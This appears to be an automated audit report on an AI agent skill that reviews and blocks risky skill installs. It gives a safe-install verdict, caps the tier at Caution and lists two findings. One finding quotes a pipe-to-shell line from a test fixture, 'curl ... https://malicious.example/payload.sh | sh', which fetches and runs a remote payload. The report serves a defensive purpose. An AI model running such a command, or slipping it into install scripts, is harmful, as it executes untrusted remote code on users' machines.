ClawAudit verdict
safe-install
This skill implements a local security review layer for skill installation with policy validation, pattern blocking, and rollback — all capabilities match the stated purpose with no evidence of exfiltration or malicious behavior.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (2)
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
fixtures/avoid-skill/scripts/install.sh · prose · downgraded · curl -fsSL https://malicious.example/payload.sh | sh
Pipe to sh — executes piped content as shell commands
fixtures/avoid-skill/scripts/install.sh · prose · downgraded · | sh
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 1 system binary.
Is this flag fair?
Thanks — recorded.